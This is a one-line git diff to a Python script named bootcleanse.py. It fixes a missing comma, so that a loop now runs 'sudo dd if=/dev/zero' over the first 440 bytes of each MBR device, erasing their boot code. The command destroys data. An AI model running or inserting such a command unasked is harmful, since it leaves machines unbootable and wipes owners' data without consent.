diff options
| -rw-r--r-- | bootcleanse.py | 2 |
1 files changed, 1 insertions, 1 deletions
diff --git a/bootcleanse.py b/bootcleanse.py index 60feb36..fa941f9 100644 --- a/bootcleanse.py +++ b/bootcleanse.py @@ -32,5 +32,5 @@ while True: for mbr in mbrs: - Popen(['sudo' 'dd', 'if=/dev/zero', 'of=' + mbr, 'bs=440', 'count=1'], stdin=PIPE, stdout=PIPE, stderr=PIPE).communicate() + Popen(['sudo', 'dd', 'if=/dev/zero', 'of=' + mbr, 'bs=440', 'count=1'], stdin=PIPE, stdout=PIPE, stderr=PIPE).communicate() |
